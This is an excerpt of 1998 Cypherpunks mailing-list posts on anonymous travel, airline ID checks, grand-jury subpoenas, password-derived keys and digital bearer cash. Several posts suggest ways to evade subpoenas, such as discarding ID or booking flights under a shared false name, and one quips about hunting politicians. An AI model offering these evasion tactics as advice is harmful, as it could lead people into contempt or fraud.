risks -- of confiscation, imprisonment, and death -- and because it
usually increases efficiency. All of these pragmatic considerations seem
much more important than the ease of maintenance, at least to me.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Wed, 28 Oct 1998 03:53:39 +0800
To: Chip Mefford <cmefford@video.avwashington.com>
Subject: Re: your mail
Message-ID: <19981027190715.184.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



I traveled by train all the way to Florida from Rhode Island once.  24
hours straight it took man and I swore I would never do it again. 
40-50 people per car and basically one bathroom per car.  Come morning
time man, the lines for the bathrooms stretched out of the cars. 
Screw that, I could have flown and made it in 3 hours. Plus it's
easier for the gov't to stop trains and search them, I'd rather go
with the flight.




---Chip Mefford <cmefford@video.avwashington.com> wrote:
>
> 
> 
> Where possible, 
> 
> fuk a bunch of airlines anyway.
> 
> Travel by train is a lot more enjoyable, relaxing, fun.
> Folks that travel by train could fly, but would
> preferr to enjoy the ride, cause it ain't no cheaper, 
> 
> except, !!
> 
> you can pay with cash and show no id and go
> where you would like in the lower 48.
> 
> anonymously.
> 
> On Tue, 27 Oct 1998, Anonymous wrote:
> 
> > At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
> > >At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
> > >>9.  "I do not posses any government-issued photo ID and thus
cannot travel
> > >>to the location stated in the subpoena. 
> > >
> > >ROTFLMAO...
> > >
> > >This last one is too funny to not use.  I don't have a subpoena,
but I can
> > >just see myself writing back explaining this and requesting
assistance with
> > >a plane flight to solve this problem.
> > 
> > Actually you don't need state id to fly, legally.  But the
airlines will
> > hassle you and not put your bags aboard til you are.  There
> > are references on the net to flying without state id.
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> >   
> > 
> > 
> > 
> > 
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Wed, 28 Oct 1998 04:15:49 +0800
To: Chip Mefford <cmefford@video.avwashington.com>
Subject: Re: your mail
Message-ID: <19981027193249.14523.rocketmail@send104.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



That's cool man, I see your point.  Guess I shouldn't knock it when
I've only had one experience.  It's true, I got on the train quicker
than I've ever gotten on a flight and didn't face any harrassment. 
Actually, I faced more harrassment from my Gestapo math teacher in
high school trying to board a bus than getting on the train.  He
looked at me and told me I was trouble and searched every crevice of
my bag, personal being and space.  "But doctor, both your hands on my
shoulders. . ."you get the point and that's exactly what's happening
to us each and every day.  




---Chip Mefford <cmefford@video.avwashington.com> wrote:
>
> 
> 
> I've taken that same route, except up 
> to no. Vermont rather than RI,
> 
> I travelled anonymously, for an extra 50 bux, 
> I had my own little private cabin, I was never
> searched, my bags were never xrayed by incompetent
> androids, was able to find company from the 
> hordes that you describe to sit with me in my
> lil cabin and spend some time (wink wink, nudge
> nudge) and so forth. 
> 
> yeah, an entire day spent with a whole pile of 
> folks can really be a horrible drag, and I'm
> told that travelling on the weekends thats
> what you can expect. 
> 
> But, shuffling in and out of Polizei Central, 
> subjecting myself to xrays and potential 
> cavity searches, showing ID to every bone
> head that demands it, just seems a little
> too kyrstalnachtish for my taste, I don't care
> if I EVER fly again. 
> 
> Its easier, less hassle, more anonymous to
> travel by train than it is to drive, or
> for that matter, walk.
> 
> yes, its VERY easy for the SS
> to stop and search a train, but the plane 
> is a forgone situation. By entering an
> airport, you've already consented to be
> stripped of nearly every right you thought
> you may have had.
> 
> I had an experience like you describe travelling
> from Atlanta to DC by bus once when a young-un. 
> I too, swore I'd never do it again, and I didn't,
> not till I mustered out of the military and they
> stuck me on a 10 hr busride to the nearest
> depot to go home, and yes, I still hated it.
> 
> to each his own, 
> 
> take care
> 
> chipper
> 
> On Tue, 27 Oct 1998, Joel O'Connor wrote:
> 
> > I traveled by train all the way to Florida from Rhode Island once.
 24
> > hours straight it took man and I swore I would never do it again. 
> > 40-50 people per car and basically one bathroom per car.  Come
morning
> > time man, the lines for the bathrooms stretched out of the cars. 
> > Screw that, I could have flown and made it in 3 hours. Plus it's
> > easier for the gov't to stop trains and search them, I'd rather go
> > with the flight.
> > 
> > 
> > 
> > 
> > ---Chip Mefford <cmefford@video.avwashington.com> wrote:
> > >
> > > 
> > > 
> > > Where possible, 
> > > 
> > > fuk a bunch of airlines anyway.
> > > 
> > > Travel by train is a lot more enjoyable, relaxing, fun.
> > > Folks that travel by train could fly, but would
> > > preferr to enjoy the ride, cause it ain't no cheaper, 
> > > 
> > > except, !!
> > > 
> > > you can pay with cash and show no id and go
> > > where you would like in the lower 48.
> > > 
> > > anonymously.
> > > 
> > > On Tue, 27 Oct 1998, Anonymous wrote:
> > > 
> > > > At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
> > > > >At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
> > > > >>9.  "I do not posses any government-issued photo ID and thus
> > cannot travel
> > > > >>to the location stated in the subpoena. 
> > > > >
> > > > >ROTFLMAO...
> > > > >
> > > > >This last one is too funny to not use.  I don't have a
subpoena,
> > but I can
> > > > >just see myself writing back explaining this and requesting
> > assistance with
> > > > >a plane flight to solve this problem.
> > > > 
> > > > Actually you don't need state id to fly, legally.  But the
> > airlines will
> > > > hassle you and not put your bags aboard til you are.  There
> > > > are references on the net to flying without state id.
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > > 
> > > >   
> > > > 
> > > > 
> > > > 
> > > > 
> > > 
> > > 
> > 
> > ==
> > Ogre bounces like sonar. . .Peace.
> >                   Ogre
> > 
> > _________________________________________________________
> > DO YOU YAHOO!?
> > Get your free @yahoo.com address at http://mail.yahoo.com
> > 
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 28 Oct 1998 04:08:36 +0800
To: "Robert A. Costner" <cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <4.0.2.19981026110245.03e27250@panix.com>
Message-ID: <4.0.2.19981027112335.03c0c840@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
>At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
>>9.  "I do not posses any government-issued photo ID and thus cannot travel
>>to the location stated in the subpoena. 
>
>ROTFLMAO...
>
>This last one is too funny to not use.  I don't have a subpoena, but I can
>just see myself writing back explaining this and requesting assistance with
>a plane flight to solve this problem.


I was glad I thought that one up yesterday.  It can be used in all sorts of
cases from future conscription notices to private travel demands that one
wishes to avoid.  

Note that short of arrest, it is difficult for anyone else to force you to
have a government issued photo ID in your possession.  You can take all
your stuff and Fedex it to your Swiss lawyer (or some friend) telling him
to not give it to you for some period of time.  You can burn your ID, throw
it away, and not apply for replacements.  There currently exists no means
of applying for ID on your behalf if you don't do it (save for kids and
those in custody).  

The beauty is that the authorities have created this requirement and it can
be used against them.  Previous techniques such as claiming lack of money
can be satisfied with government travel tickets but ID requirements will be
a tougher nut to crack.  Maybe they'll tell you to take Amtrak or the Grey
Dog.

DCF   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Oct 1998 05:15:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <3.0.3.32.19981026144314.038c6020@rboc.net>
Message-ID: <v0313030ab25bdd5864c0@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:36 AM -0800 10/27/98, Duncan Frissell wrote:

>The beauty is that the authorities have created this requirement and it can
>be used against them.  Previous techniques such as claiming lack of money
>can be satisfied with government travel tickets but ID requirements will be
>a tougher nut to crack.  Maybe they'll tell you to take Amtrak or the Grey
>Dog.

Here on the West Coast, they could perhaps suggest one take the Green
Tortoise, a hippie-type bus that runs up and down the coast.

However, one might then set off the drug-sniffing detectors/dogs at the
courthouse.

Duncan gave us an interesting list, but I suspect at least half of them
would result in the judge saying, "Fine. Think about in your cell. I find
you in contempt."

I have a couple of questions about the subpoena process, though:

* Is travel paid for? How?  By spending hours completing forms in
quadruplicate, or do they just cut a check for some per diem sort of
payment?

* What if one has pressing engagements? (Travel out of the country, an
anniversary party, washing the dog?)

* What if one shows up with no records and claims not to have them?

* What about lawyer expenses? I know the line about "If you cannot afford
one, one will be appointed for you," but I've never understood what test of
"afford" is being used. If called before a grand jury, will they pay for a
lawyer? (E.g., if I decide I can't "afford" to pay some shyster to
interpret their legalese into ordinary English.)  (I asssume there is some
nonsense about indigence, but can they force someone to prove he has no
money? What if he money, but he needs that $5000 for school tuition more
than he needs to give it to Johnny Cockroach for a day's worth of
shystering?)

More soberly, this kind of subpoena could well nuke the Cypherpunks list,
even the distributed node instance. If Igor Chudov, Lance Cottrell, and Jim
Choate all have to fly to Seattle and face scrutiny, implied threats, and
possible jail time for failing to jump when the Feds say jump, they may
decide to stop acting as Fed magnets.

Oh, and what if one shows up at the Federal Courthouse without any I.D.? As
there are no mandatory I.D. laws, what can they do? (I had planned to test
this one the last time I almost got called for jury duty. My planned retort
was to be, "But I'm not driving a car here in the courthouse, so why would
I need a driver's license? And, last I checked, this is still the United
States, so why would I need a passport?")

"I'm Tim May, and you can believe it or not. Maybe I'm a bum hired by Tim
for a bottle of Ripple, maybe I'm some other Tim, maybe I'm an astrally
projected Tim. Take your pick."


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Wed, 28 Oct 1998 05:33:55 +0800
To: xasper8d@lobo.net
Subject: Re: Airline ID Checking (was: RE: your mail)
Message-ID: <19981027204352.13039.rocketmail@send103.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Who knows for sure anymore.  Because of the "Anti-Terrorism" bill, it
is required that security be beafed up.  When they scan the ID, it is
to check against their records that you are who you say you are. . .so
they say.  In actuality, they are tracing movements of people, so if
the shit comes down, they will know where everyone is, no matter where
you flew to.  Even with trains, all's it will take is one bomb and you
better believe security will be pumped up as high as it is with
airlines.  Who knows anymore, there's so much going on at every
spectrum of this globe that the probability of keeping up with a minor
fraction is hard enough.  The gov't control's all major transportation
routes, which control's movement and where everyone is at all times. 
Soon, there will be no where to run to.




---X <xasper8d@lobo.net> wrote:
>
> Does anyone know what the airlines do with the info they collect off
the ID?
> Are they just noting whether the names match, or is it more sinister?
> 
> When I was below legal drinking age (21 in my state) I would drive
up to the
> window (how barbaric!  liquor sales to guys in cars!) and give the
> sub-moronic guy my REAL ID under the assumption that:  he expects it
to say
> something that proves I am over age, or else why would I be handing
it to
> him? [nicely enough, this shifts all of the risk of the transaction
to him,
> should it go wrong.]
> 
> Similarly, if you booked a flight under the name Nevah Umind, when
you hand
> over a piece of ID, they look to see it says Nevah Umind (unless, of
course,
> your name happens to be Nevah Umind) and that's all they want, right?
> 
> And if we all booked flights under the same name, then wouldn't that
throw
> 'em WAY off?  Pick a name, DON'T scan your license in, DON'T edit
it, DON'T
> laminate it, and (for pete's sake!) DON'T use that name.  Their
querying
> will tell them, "I have a match, he's okay" (These are not the
droids you
> are looking for, eh!) and away you go!
> 
> X
> 
> 
> ~> -----Original Message-----
> ~> From: owner-cypherpunks@minder.net
> ~> [mailto:owner-cypherpunks@minder.net]On Behalf Of Joel O'Connor
> ~> I traveled by train all the way to Florida from Rhode Island
once.  24
> ~> hours straight it took man and I swore I would never do it again.
> ~> 40-50 people per car and basically one bathroom per car.  Come
morning
> ~> time man, the lines for the bathrooms stretched out of the cars.
> ~> Screw that, I could have flown and made it in 3 hours. Plus it's
> ~> easier for the gov't to stop trains and search them, I'd rather go
> ~> with the flight.
> ~>
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 28 Oct 1998 02:15:45 +0800
To: "D. Porter" <dporter@denova.com>
Subject: Re: files (was: Re: dbts, etc.)
Message-ID: <199810271744.MAA12393@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain




My 1.43 US cents (hey, two canadian cents aren't worth much nowadays!)

On 27 Oct 98 10:52:00, D. Porter wrote:

>Steve, as you point out most of us are driven primarily by practical
>concerns. This is a philosophy: pragmatism. Beyond mind exercise,
>philosophy is valuable exactly to the extent it is practical.

Pragmatism, as far as philosophy structure is concerned,  is opportunistic in 
the sense that it gets a free ride on other's failures to come up with basic 
premises that are compatible with reality...


>DBS increases freedom. Increased freedom is practical because it reduces
>risks -- of confiscation, imprisonment, and death -- and because it
>usually increases efficiency. All of these pragmatic considerations seem
>much more important than the ease of maintenance, at least to me.

Well, this is a point not shared at all by the collectivistic-oriented 
philosophies, which places the "good of the collective", whatever it may mean, 
above the values you mentionned.  And to deprive them of the ability of 
imposing confiscation, imprisonment and death it to cut them out of their 
tools...

Ciao

jfa


"The tree of liberty must be watered periodically with the blood of
tyrants...."

"Both oligarch and tyrant mistrust the people, and therefore deprive them of their arms."
  -- Aristotle, "Politics"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Wed, 28 Oct 1998 02:44:00 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: your mail
In-Reply-To: <199810271524.QAA07247@replay.com>
Message-ID: <Pine.LNX.3.95.981027125729.32230B-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain





Where possible, 

fuk a bunch of airlines anyway.

Travel by train is a lot more enjoyable, relaxing, fun.
Folks that travel by train could fly, but would
preferr to enjoy the ride, cause it ain't no cheaper, 

except, !!

you can pay with cash and show no id and go
where you would like in the lower 48.

anonymously.

On Tue, 27 Oct 1998, Anonymous wrote:

> At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
> >At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
> >>9.  "I do not posses any government-issued photo ID and thus cannot travel
> >>to the location stated in the subpoena. 
> >
> >ROTFLMAO...
> >
> >This last one is too funny to not use.  I don't have a subpoena, but I can
> >just see myself writing back explaining this and requesting assistance with
> >a plane flight to solve this problem.
> 
> Actually you don't need state id to fly, legally.  But the airlines will
> hassle you and not put your bags aboard til you are.  There
> are references on the net to flying without state id.
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
>   
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RedRook <redrook@yahoo.com>
Date: Wed, 28 Oct 1998 06:58:58 +0800
To: cypherpunks@toad.com
Subject: Using a password as a private key.
Message-ID: <19981027215307.3786.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



&#130;&#130;&#130;&#130;Assymetic crypto systems such as
Diffie-Hellman, El-Gamel, and DSS, allow the private key to be a
randomly chosen number. &#130;But, as a cute hack, instead of using a
random number, for the private key, you could use a hash of the User
Name, and a password. 

Doing so allows the users to generate their private key on demand.
They don't have to store the private key, and if they want to work on
a another computer, they don't need to bring along a copy.&#130;
Has any one tried this? Is there existing software that does this? Any
comments on the security of such a scheme? &#130;
The only draw back that I can think of is the potential lack of
randomness in the key. If the user chooses a bad password, it would be
possible to brute force the public key.&#130;
Harv.&#130;&#130;RedRook@yahoo.com&#130;&#130;&#130;&#130;&#130;&#130;&#130;&#130;
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Wed, 28 Oct 1998 04:14:40 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: your mail
In-Reply-To: <19981027190715.184.rocketmail@send101.yahoomail.com>
Message-ID: <Pine.LNX.3.95.981027141132.32738A-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain





I've taken that same route, except up 
to no. Vermont rather than RI,

I travelled anonymously, for an extra 50 bux, 
I had my own little private cabin, I was never
searched, my bags were never xrayed by incompetent
androids, was able to find company from the 
hordes that you describe to sit with me in my
lil cabin and spend some time (wink wink, nudge
nudge) and so forth. 

yeah, an entire day spent with a whole pile of 
folks can really be a horrible drag, and I'm
told that travelling on the weekends thats
what you can expect. 

But, shuffling in and out of Polizei Central, 
subjecting myself to xrays and potential 
cavity searches, showing ID to every bone
head that demands it, just seems a little
too kyrstalnachtish for my taste, I don't care
if I EVER fly again. 

Its easier, less hassle, more anonymous to
travel by train than it is to drive, or
for that matter, walk.

yes, its VERY easy for the SS
to stop and search a train, but the plane 
is a forgone situation. By entering an
airport, you've already consented to be
stripped of nearly every right you thought
you may have had.

I had an experience like you describe travelling
from Atlanta to DC by bus once when a young-un. 
I too, swore I'd never do it again, and I didn't,
not till I mustered out of the military and they
stuck me on a 10 hr busride to the nearest
depot to go home, and yes, I still hated it.

to each his own, 

take care

chipper

On Tue, 27 Oct 1998, Joel O'Connor wrote:

> I traveled by train all the way to Florida from Rhode Island once.  24
> hours straight it took man and I swore I would never do it again. 
> 40-50 people per car and basically one bathroom per car.  Come morning
> time man, the lines for the bathrooms stretched out of the cars. 
> Screw that, I could have flown and made it in 3 hours. Plus it's
> easier for the gov't to stop trains and search them, I'd rather go
> with the flight.
> 
> 
> 
> 
> ---Chip Mefford <cmefford@video.avwashington.com> wrote:
> >
> > 
> > 
> > Where possible, 
> > 
> > fuk a bunch of airlines anyway.
> > 
> > Travel by train is a lot more enjoyable, relaxing, fun.
> > Folks that travel by train could fly, but would
> > preferr to enjoy the ride, cause it ain't no cheaper, 
> > 
> > except, !!
> > 
> > you can pay with cash and show no id and go
> > where you would like in the lower 48.
> > 
> > anonymously.
> > 
> > On Tue, 27 Oct 1998, Anonymous wrote:
> > 
> > > At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
> > > >At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
> > > >>9.  "I do not posses any government-issued photo ID and thus
> cannot travel
> > > >>to the location stated in the subpoena. 
> > > >
> > > >ROTFLMAO...
> > > >
> > > >This last one is too funny to not use.  I don't have a subpoena,
> but I can
> > > >just see myself writing back explaining this and requesting
> assistance with
> > > >a plane flight to solve this problem.
> > > 
> > > Actually you don't need state id to fly, legally.  But the
> airlines will
> > > hassle you and not put your bags aboard til you are.  There
> > > are references on the net to flying without state id.
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > >   
> > > 
> > > 
> > > 
> > > 
> > 
> > 
> 
> ==
> Ogre bounces like sonar. . .Peace.
>                   Ogre
> 
> _________________________________________________________
> DO YOU YAHOO!?
> Get your free @yahoo.com address at http://mail.yahoo.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 28 Oct 1998 07:10:41 +0800
To: cypherpunks@toad.com
Subject: Re: No Subject
Message-ID: <36364AB2.5C26@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Most of nature is a very high quality vacuum, actually.
>
Yup, I did my 100hrs of Physics, Chemistry and Math too. I like the way
the 'vacuum' behaves near very hi-Z nuclei.

> Governments have not always been so parasite-infested;
>
And I find this very difficult to believe. 

> this disease progresses slowly, numbingly, unnoticed, like leprosy.
>
Interesting that you use 'numbingly' to describe leprosy; it shows an
understanding of the nature of the infection. Be careful if you swim in
the freshwater streams in Hawaii. Better not have any cuts or abrasions!

More interesting, though, is this: why would a block cipher use key bits
rather than an LFSR to do input or output whitening? Is it strictly a
performance issue? Is it proven that doing this doesn't leak key bits in
some way?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Oct 1998 05:39:50 +0800
To: cypherpunks@cyberpass.net,       e$@vmeng.com
Subject: dbts: Privacy Fetishes, Perfect Competition, and the ForegoneAlternative
In-Reply-To: <199810271738.MAA03351@postal.research.att.com>
Message-ID: <v04020a47b25bbfbb8eaf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 12:38 PM -0500 on 10/27/98, Steve Bellovin wrote on dbs:

> For the record, though, I not only don't think that cryptography should
> make the state vanish, I don't think that it will.

Cryptographer ~== Libertarian, certainly. Much less Anarchist.

I like to joke that David Chaum is a liberal statist with a privacy fetish.
PRZ was, too, but, after his bout with a certain kangaroo court prosecutor,
I bet he isn't so liberal anymore. :-)

Crypto *is*, however, a liberty/anarchy magnet. It certainly changed my
thinking about a whole lot of things, including how the state will collapse,
someday, in a giant paroxysm of technological determinism. ;-).


Dragging this back to the topic of the DBS list itself (and, frankly, the
topic is a subset of the cryptography list, too, and lots of others,), the
paradox of financial cryptography, and, more specifically, digital bearer
settlement, is not that it gives you privacy and freedom (anarchy? :-)),
it's because it gives you *cheaper* transactions. Transactions which just
happen to be anonymous.  You don't *have* to keep records in the normal
course of business in order to keep your transactions from unraveling at
some later date.

You can monitor your own business operations, certainly.  But you're not
*forced* to, by some, um, regional monopoly. That's attractive. To lots of
economic actors, besides terrorists, drug dealers, pedophiles and money
launderers. :-). To machines, for instance, but also to actors in  markets
which are, as they say in economics, perfectly competitive, where things
are sold like commodities are.

This is opposed to so-called monopolistic competition, where all of a
company's products are branded as much as possible. McDonald's versus Burger
King is a good example of monopolistic competition. McDonald's doesn't make
something *exactly* like a Whopper, for instance, if they did, they'd be sued
for copyright violation, or even patent enfringement, though they do make
branded, and patented, almost-substitutes. Coke and Pepsi are the same kinds
of thing. Except for the Secret Coke Formula, of course. :-).

But, stuff like soybeans, or switched bits on a wire, or copies of Linux, or
cash, or debt, or even equity in the portfolio aggregate like a stock index,
are not *branded*, they're *graded*.

Every item in a perfectly competitive market is perfectly substitutable with
any other item in that market.  If you're trading graded commodities, you
don't *care* who you're doing business with. You care about what they're
selling you. And it's something which you can verify the quality of on an
independent basis. Those grades are certified by someone with a reputation,
of course, but even those reputations are graded to the extent that they're
priced in a market somewhere. A NYSE seat, for instance, has a price on it,
and I think internet product-certifying reputations will too, someday.
That's what a digital bearer underwriter is, when you think about it.


I think, over time, that Moore's law and a geodesic internetwork gives us
increasingly perfect, and not monopolistic, competition, and, in practically
every market you can imagine. Graded surgical instructions, say.

And to bring up that paroxysm again, if you could convert teleoperated machine
instructions like surgery into graded, fungible, and cash-settled,
commodities, why not force, currently the product of that most monopolistic of
competitors, the nation-state?

Anyway, I think that these perfectly competitive markets will be the of
hallmark of a geodesic information economy, just like marketing and branding
and monopolistic competition are the hallmarks of a late-industrial,
hierarchically-organized, mass-media economy.


But, again, it is the reduced *cost* of those cryptographically-enabled
transactions which will drive everything else, and that is a logical outcome
of the technology of financial cryptography and digital bearer transactions.

The cost of anything is the foregone alternative.


Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNjYjzcUCGwxmWcHhAQGOmgf9F3ZHnTP1Io83CJEPmyiTWww/ppvupmiW
uHh2i+txJoigxNxDbMHtRQDzP9FXtADH8z+nbGmWZY4PnxbxmKcSFDfH0zXL2sMi
beHYaUvya14gtchwPZkCx/XxaZ4RYnZeg7BvjlYWDjScZwgoJP5rV63tSW/gDri1
bnAt2Oa7pNpSmBFad7LNuSTOw0BVZzaoJ/Ucl+MSp2//frf4iL/7p/XjJcOlnhI7
0KyTtAjhfuV886clgpcFfceaS9G14q1FPZfh7yzZyWMReOEe3S1JDptEuuIX35AJ
r/2GgSSulY2/v/D6qOgZk6FUgRNFxtMKts6FU8hce0CdN/Pprj97JQ==
=xWio
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 27 Oct 1998 16:34:08 +0800
To: coderpunks@toad.com
Subject: backtracking.....
Message-ID: <Pine.GSO.3.96.981027155454.12663B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Could someone point or tell me where and what good 
backtracking problems could I get (then I'll implement it in parallel).

e.g. 

queen's tour 
knight's tour

Could you give me new and interesting ones.

Thank you very much.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 28 Oct 1998 00:01:23 +0800
To: cypherpunks@toad.com
Subject: Re: IP: Uncle Sam Wants Spooks.
Message-ID: <199810271521.QAA06953@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 02:04 PM 10/26/98 -0500, Robert Hettinga wrote:
> "We teach a concept called open source and
> public domain intelligence -- that is, taking what
> is in the public domain and creating new
> knowledge by analysis and interpretation," he

So does John Young, EFF, FAS, etc.

> Applying for a job with the CIA is easy: Send a
> resume. The CIA scans the resumes it gets

Applying for a job with the NSA is easier.  Just
fax your resume.  Doesn't matter where.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 28 Oct 1998 00:03:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810271521.QAA06961@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:42 AM 10/26/98 -0800, Michael Motyka wrote:
>> How does this differ from the motives of your ordinary politician?
>> 
>> Post-revolution, will there be caliber limitations when hunting them?
>
>Hunt all you want. The post-revolution utopia will be administered by
>persons of the same mentality as those we have administering our
>Democratic Republic now. They will use the same if not more advanced
>techniques to acquire and maintain power. "Nature abhors a vacuum",
>right?

Most of nature is a very high quality vacuum, actually.

Governments have not always been so parasite-infested; this
disease progresses slowly, numbingly, unnoticed, like leprosy.










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 28 Oct 1998 00:09:39 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810271524.QAA07247@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
>At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
>>9.  "I do not posses any government-issued photo ID and thus cannot travel
>>to the location stated in the subpoena. 
>
>ROTFLMAO...
>
>This last one is too funny to not use.  I don't have a subpoena, but I can
>just see myself writing back explaining this and requesting assistance with
>a plane flight to solve this problem.

Actually you don't need state id to fly, legally.  But the airlines will
hassle you and not put your bags aboard til you are.  There
are references on the net to flying without state id.










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Wed, 28 Oct 1998 09:26:04 +0800
To: "'Michael Motyka'" <cypherpunks@toad.com
Subject: RE: No Subject
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD2A@DINO>
MIME-Version: 1.0
Content-Type: text/plain



> More interesting, though, is this: why would a block cipher 
> use key bits
> rather than an LFSR to do input or output whitening? Is it strictly a
> performance issue? Is it proven that doing this doesn't leak 
> key bits in
> some way?
> 
> Mike
> 

In many newer block ciphers, the key schedule comes from a fairly good one
way hash of the key. Take a look at RC6, or TwoFish. Essentially this
accomplishes the same thing as using a good LSFR.

Harv.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 07:12:15 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: MIB Subponeas (fwd)
Message-ID: <199810272256.QAA09817@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 27 Oct 1998 12:42:36 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: MIB Subponeas

> * Is travel paid for? How?  By spending hours completing forms in
> quadruplicate, or do they just cut a check for some per diem sort of
> payment?

The IRS offered to pay my travel from the local Austin airport to Seattle
and pay the hotel bill and meals. I was trying to determine how
transportation in Seattle was going to be handled when they said they didn't
need me in person.

> * What if one has pressing engagements? (Travel out of the country, an
> anniversary party, washing the dog?)

I told them I didn't want to go to Seattle, they suggested an affadavit.

> * What if one shows up with no records and claims not to have them?

Exactly what I did after checking to make sure I didn't. They said 'Ok'.

> * What about lawyer expenses? I know the line about "If you cannot afford

What lawyer? You don't get a lawyer with Grand Juries.

> More soberly, this kind of subpoena could well nuke the Cypherpunks list,

Not even hardly. A subpoena isn't an accussation, it's an instrument to
obtain potentialy relevant testimony and evidence. It means (at least in
this case) "We believe you may know something or have possession of
